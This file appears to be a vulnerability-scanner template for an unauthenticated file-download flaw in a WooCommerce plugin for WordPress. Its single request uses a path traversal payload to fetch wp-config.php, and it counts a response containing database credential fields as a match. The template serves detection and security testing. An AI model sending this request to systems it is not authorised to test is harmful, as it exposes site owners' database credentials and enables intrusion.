id: wp-woocommerce-file-download

info:
  name: WordPress WooCommerce < 1.2.7 - Unauthenticated File Download
  author: 0x_Akoko
  severity: high
  description: "WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload."
  reference:
    - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74
    - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id:
    cwe-id: CWE-22
  tags: wordpress,woocommerce,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/04/13